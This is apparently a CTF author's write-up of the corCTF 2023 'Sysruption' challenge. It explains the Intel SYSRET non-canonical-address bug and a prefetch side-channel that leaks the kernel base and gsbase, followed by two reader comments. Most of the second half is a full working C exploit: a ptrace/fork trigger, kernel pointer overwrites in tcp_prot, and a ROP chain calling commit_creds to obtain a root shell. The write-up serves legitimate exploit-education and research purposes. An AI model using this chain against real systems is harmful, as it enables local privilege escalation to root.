Sysruption was a hardware, micro-architectural, and kernel exploitation challenge I wrote for corCTF 2023. It is my personal favorite challenge for this CTF as it tied closely into my first µarch CVE (EntryBleed), showcased the applicability of a µarch attack in a realistic exploit, and was built on the premise of a real hardware bug.
This bug has re-appeared multiple times throughout the years, manifesting first in CVE-2006-0744. It subsequently returns to haunt systems in CVE-2012-0217, affecting FreeBSD, Xen hypervisor, Solaris, Windows 7, and many other operating systems - people have documented their exploits for different OSes such as this one for FreeBSD and this one for Xen hypervisor. To my knowledge, the last publicly known time this bug came back again was in CVE-2014-4699 on Linux. Since 2014 was before the era of all the modern kernel mitigations like KASLR and the previous writeup targeted it on a system without SMAP and with a writeable IDTs, the premise of this challenge became exploiting this on a modern Linux system with standard hardening features. Before I continue, a huge shout out must go to zolutal for first-blooding this challenge - he has a really amazing writeup for it!
I first heard about this bug in MIT’s 6.888 Secure Hardware Design Course, which also taught me about the prefetch attack that inspired EntryBleed through their lab assignments (along with other cool labs like Spectre, Rowhammer, L2 prime and probe, and RISC-V CPU fuzzing). So what exactly is this sysret bug?
According to Intel, this is not a bug (but a feature?) - it’s the software developer’s fault for not carefully reading the documentation. To quote the SDM:
SYSRET is a companion instruction to the SYSCALL instruction. It returns from an OS system-call handler to user code at privilege level 3. It does so by loading RIP from RCX and loading RFLAGS from R11. With a 64-bit operand size, SYSRET remains in 64-bit mode; otherwise, it enters compatibility mode and only the low 32 bits of the registers are loaded.
As the documentation then proceeds to state, if the RCX address is non-canonical, then a general protection fault happens in ring 0, so the exception handler in ring 0 runs. In contrast, AMD has the fault happen in userland (which would then crash the process in ring 3). By having a general protection fault happen in a syscall return sequence where all the userland registers have been restored (including the stack pointer) at ring 0, the exception handler will happily start saving the current CPU state with the restored stack pointer, effectively giving us an arbitrary write vulnerability using the pre-exception register state.
To bring back this bug, I made the following patch, on kernel 6.3.4.
--- orig_entry_64.S +++ linux-6.3.4/arch/x86/entry/entry_64.S ALTERNATIVE "shl $(64 - 48), %rcx; sar $(64 - 48), %rcx", \ "shl $(64 - 57), %rcx; sar $(64 - 57), %rcx", X86_FEATURE_LA57 #else - shl $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx - sar $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx + # shl $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx + # sar $(64 - (__VIRTUAL_MASK_SHIFT+1)), %rcx #endif /* If this changed %rcx, it was not canonical */ - cmpq %rcx, %r11 - jne swapgs_restore_regs_and_return_to_usermode + # cmpq %rcx, %r11 + # jne swapgs_restore_regs_and_return_to_usermode cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */ jne swapgs_restore_regs_and_return_to_usermode
This effectively reverts a precise check for non-canonical addresses introduced by this patch.
How exactly do we trigger this bug? The 2014 CVE PoC
is still applicable in this case, and I borrowed that with a few slight
modifications. The PoC basically chained ptrace and forks in a way to
modify the registers such that the grandchild task attempts to return to
a non-canonical address upon sysret. A canonical address is simply one
where bit 63 to whatever the highest bit supported by the chipset is all
1s or 0s (hence the shl
and sar
usage in the original check). I was actually surprised that this still worked, as Linux introduced a patch to force irets for this chain of ptrace usage. Fortunately for us, this was actually removed in a subsequent patch once the stronger check before sysret was introduced.
Unlike the 2014 PoC, the Linux kernel now comes with KASLR. This is where the second main component of my challenge comes in - a micro-architectural (or µarch) attack. In my opinion, µarch attacks are often overlooked in developing exploits when talking to some people working in the VR industry. Since Spectre and Meltdown, a flurry of new research for similar attacks started in academia, many of which are really fascinating attacks and reveal just how crazy modern hardware is. While some worked pretty well and would definitely be applicable in the real world, there are also many that really only work in pristine noiseless lab conditions on specific system configurations, topped off with an extremely low side-channel leakage rates. Perhaps it’s these latter attacks that cause real world exploit developers to often shrug off this vector of attack.
As documented in my EntryBleed attack against KPTI, and ProjectZero’s writeup for CVE-2022-42703, the prefetch µarch attack from Daniel Gruss is one of those attacks that are extremely fast and accurate at leaking something sensitive (in this case, KASLR). Please refer to those links for more information regarding how the attack works.
Note that the kernel is running without KPTI so you can also reliably leak other sections of kernel memory asides from text and data (a limitation of EntryBleed). This isn’t me making the challenge easier though - when the Linux kernel detects that a CPU is hardware mitigated against Meltdown, KPTI is not enabled by default. This is certainly a strange choice (though probably for the sake of performance), as Meltdown is not the only type of µarch attack that can break KASLR based on the shared page-table scheme. Regardless, this is perfect for this challenge as I ran it on a dedicated Cascade Lake server, so KPTI would be disabled by default.
The exploitation strategy from here should be to use a prefetch
attack to leak the kernel base address, and then choose a target to
overwrite in writeable kernel image sections. But an immediate issue
that arises is that when executing sysret
, the kernel is now using a userland GS register due to the preceeding swapgs
instruction.
The GS register is vital to per cpu data referencing in the kernel - in
fact, when the GPF executes with an invalid gs register, it repeatedly
page faults until the system gives up and panics. This is because there
are attempts made to access memory offsets from the GS register in these
handlers. The exception handler in error_entry
will only manually switch to a kernel gs if the exception source was from userland.
Like Zolutal, I first attempted to control the userland GS register with prctl
, but the kernel checks that it is in userland address range.
There also really isn’t way for me to find something in kernel data or
text to act as a fake gsbase either. Luckily, x86_64 has had the fsgsbase extension for a while now, which “allows applications to directly write to the FS and GS segment registers.”
Now we need to leak gsbase. It’s in physmap at a constant offset (I believe that the first percpu chunk always piggy backs off of the linear direct physical mapping according to comments, so the offset would be RAM dependent?). In my exploit, I leaked physmap base by side-channeling the possible range of physmap addresses according to Linux documentation, and applying a mask to the first leaked address before adding the correct offset to gsbase. This approximation has never failed for me yet.
Looking back on the output of my side-channel, I didn’t even need to leak physmap to get cpu 0’s gsbase. As this address comes after the linear direct physical mapping and is frequently used, it would likely always be the last address that falls into the physmap range to be side-channeled out of the TLB via a prefetch attack as this is a one-core system. Of course this would mean that the increment for virtual addresses in the side-channel have to align with this gsbase address, which mine did.
With all the leaks now, I presumed that exploitation would have been trivial, and first went for common targets like modprobe_path
.
Unfortunately, the exception handler seemed to really trash up the
stack, writing around 0x860 bytes of data based on my debugging when I
had it target the CEA region. This causes a lot of important things to
be overwritten, and leaves the kernel in a highly unstable state that
usually results in a panic quite quickly. Zolutal actually managed to
get this working, and he discusses how he achieves this in his writeup.
What ended up working for me were function pointers in tcp_prot
, a technique borrowed from an exploit for CVE-2022-29582. setsockopt
then provided me enough register control to stack pivot to another ROP
chain (which I wrote ahead of time into an offset from kernel gsbase in a
previous trigger of the sysret bug) and escalate privileges to root.
Originally, I enabled oops=panic
and aimed to have players disable that setting in the first iteration of the sysret
bug to continue exploitation as the general protection fault would lead
to an oops. I wasn’t able to achieve it due to how the GPF handler
trashed the stack, but if Zolutal managed to get modprobe_path
overwrite working, then this might be feasible too.
The following is my exploit and its successful exploitation of the challenge:
void pfail(char *str) { perror(str); _exit(-1); } int assign_to_core(int core_id) { cpu_set_t mask; CPU_ZERO(&mask); CPU_SET(core_id, &mask); if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0) pfail("sched_setaffinity"); } uint64_t sidechannel(uint64_t addr) { uint64_t a, b, c, d; asm volatile (".intel_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr [%4];" "prefetcht2 qword ptr [%4];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } // #define ITERATIONS 1 // this needs to be fine tuned to work best for the gsbase and kbase leak // 8 gb more than enough int threshold = THRESHOLD; uint64_t prefetch_leak(uint64_t scan_start, uint64_t scan_end, uint64_t step) { uint64_t size = (scan_end - scan_start) / step; uint64_t *data = calloc(size, sizeof(uint64_t)); uint64_t min = ~0, addr = ~0, potential_end = 0; do { bool set = false; for (uint64_t idx = 0; idx < size; idx++) { uint64_t test_addr = scan_start + idx * step; if (potential_end && test_addr > potential_end) break; syscall(104); uint64_t time = sidechannel(test_addr); if (time < threshold) { printf("%llx %ld\n", (scan_start + idx * step), time); data[idx]++; if (!potential_end) potential_end = test_addr + POTENTIAL_END; } } for (int i = 0; i < size; i++) { if (!set && data[i] >= 1) { addr = scan_start + i * step; set = true; } } } while (addr == ~0); free(data); return addr; } uint64_t kbase = 0xffffffff81000000ull; uint64_t curr_cpu_gsbase = 0xffff88813bc00000ull; uint64_t trampoline = 0xffffffff81a00ee1ull - 0xffffffff81000000ull; uint64_t pop_rsp = 0xffffffff811083d0ull - 0xffffffff81000000ull; uint64_t pop_rsp_rsi = 0xffffffff81514860ull - 0xffffffff81000000ull; uint64_t push_rcx_jmp_ptr_rcx = 0xffffffff8136b694ull - 0xffffffff81000000ull; uint64_t pop_rsi_rdi_rbp = 0xffffffff81f006d9ull - 0xffffffff81000000ull; uint64_t pop_rdi_rcx = 0xffffffff81cda0b8ull - 0xffffffff81000000ull; uint64_t pop_rdi = 0xffffffff811d63f3ull - 0xffffffff81000000ull; uint64_t tcp_prot = 0xffffffff82160180ull - 0xffffffff81000000ull; uint64_t commit_creds = 0xffffffff8109b810ull - 0xffffffff81000000ull; uint64_t init_cred = 0xffffffff8203ade0ull - 0xffffffff81000000ull; void nopper(struct user_regs_struct *regs) {} void overwrite_ioctl(struct user_regs_struct *regs) { regs->r9 = push_rcx_jmp_ptr_rcx; } void *stack_addr = NULL; void win() { int fd = open("/root/flag.txt", O_RDONLY); char buf[300]; int n = read(fd, buf, sizeof(buf)); write(1, buf, n); puts("r000000000t"); system("/bin/sh"); } __attribute__((naked)) void escaped_from_hell() { asm volatile( ".intel_syntax noprefix;" "lea rsp, qword ptr [rip + stack_addr];" "mov rsp, qword ptr [rsp];" "mov rax, 0xff;" "not rax;" "and rsp, rax;" "push rax;" "call win;" ".att_syntax;" :::); } void trigger_sysret_bug(uint64_t stack, void (*setup_regs)(struct user_regs_struct *reg)) { struct user_regs_struct regs; int status; pid_t chld; if ((chld = fork()) < 0) { perror("fork"); exit(1); } if (chld == 0) { if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) { perror("PTRACE_TRACEME"); exit(1); } raise(SIGSTOP); // if ptrace set regs too many at once, simply just fails and never triggers sysret bug // not sure why this is the case, so set registers before ptrace asm volatile( ".intel_syntax noprefix;" "mov r14, qword ptr [pop_rsp_rsi];" "mov r13, qword ptr [pop_rdi];" "mov r12, qword ptr [init_cred];" "mov rbp, qword ptr [commit_creds];" "mov rbx, qword ptr [trampoline];" "mov r11, 0xdeadbeef;" "mov r10, 0xbaadf00d;" "lea r9, qword ptr [rip + escaped_from_hell];" "mov r8, 0x33;" // no need for stack, we can restore in naked function in asm, otherwise interfere with rax "mov rdx, 0x2b;" "mov rax, 57;" "syscall;" "ud2;" ".att_syntax;":::); } waitpid(chld, &status, 0); ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK); ptrace(PTRACE_CONT, chld, 0, 0); waitpid(chld, &status, 0); ptrace(PTRACE_GETREGS, chld, NULL, ®s); regs.rcx = 0x8fffffffffff1337; regs.rip = 0x8fffffffffff1337; regs.rsp = stack; setup_regs(®s); ptrace(PTRACE_SETREGS, chld, NULL, ®s); ptrace(PTRACE_CONT, chld, 0, 0); ptrace(PTRACE_DETACH, chld, 0, 0); exit(0); } int main(int argc, char **argv) { assign_to_core(0); int fd = socket(AF_INET, SOCK_STREAM, 0); if (argc == 2) threshold = atoi(argv[1]); // current threshold causes it to leak etext uint64_t kbase = prefetch_leak(KERNEL_BOTTOM, KERNEL_TOP, KERNEL_STEP) - 0xc00000; uint64_t curr_cpu_gsbase = (prefetch_leak(PHYSMAP_BOTTOM, PHYSMAP_TOP, PHYSMAP_STEP) & ~((1ull<<30) - 1)) - 0x100000000 + 0x13bc00000; uint64_t evil_stack = curr_cpu_gsbase + 0x860; printf("kbase: 0x%lx\n", kbase); printf("current cpu gsbase: 0x%lx\n", curr_cpu_gsbase); stack_addr = &fd; trampoline += kbase; pop_rsp += kbase; pop_rsp_rsi += kbase; push_rcx_jmp_ptr_rcx += kbase; pop_rsi_rdi_rbp += kbase; pop_rdi_rcx += kbase; pop_rdi += kbase; tcp_prot += kbase; commit_creds += kbase; init_cred += kbase; printf("stack pivot: 0x%lx\n", push_rcx_jmp_ptr_rcx); asm volatile( ".intel_syntax noprefix;" "mov rax, %0;" "wrgsbase rax;" ".att_syntax;"::"r"(curr_cpu_gsbase):"rax"); puts("calling wrgsbase"); puts("writing rop chain into current cpu gs base"); // write rop chain to gs base first if (fork() == 0) trigger_sysret_bug(evil_stack, &nopper); wait(NULL); sleep(1); evil_stack = tcp_prot + 0xb8; // overwrite ioctl in tcp proto puts("overwriting tcp_prot func pointers"); if (fork() == 0) trigger_sysret_bug(evil_stack, &overwrite_ioctl); wait(NULL); sleep(1); getchar(); // target setsockopt func ptr puts("triggering ROP"); setsockopt(fd, SOL_TCP, TCP_ULP, curr_cpu_gsbase + 0x7c0, 0x1337); puts("hi"); }
One interesting thing noticeable in the exploit is my adjusted strategy for prefetching. In my original EntryBleed PoC, I used simple averages. After doing a lot more micro-architectural attacks in the past year, I believe scoring leak candidates through a threshold system is a much better strategy and less susceptible to extreme outliers that would skew averaging. This threshold would be different across different CPUs, but would not be difficult to enumerate. Sometimes, the leak in my exploit is wrong (especially for kernel base), but I hypothesize that the accuracy could be improved if I performed a ton of memory accesses beforehand to help flush the TLB a bit more.
This concludes my writeups for corCTF 2023! Feel free to ask any questions about this or point out any mistakes. I hope people had a lot of fun with sysruption, especially as it combined a hardware quirk, a µarch attack, and a kernel exploit in one challenge as the description mentioned 😉. Congrats once again to Zolutal for the first blood, and to sampriti and team Balsn for second and third bloods, and thanks again to 6.888 for inspiring the components for this challenge!
Great. But how is the address range for side channel attacks determined?
ReplyDeleteThe probability of leaking the correct phy_base seems to be very low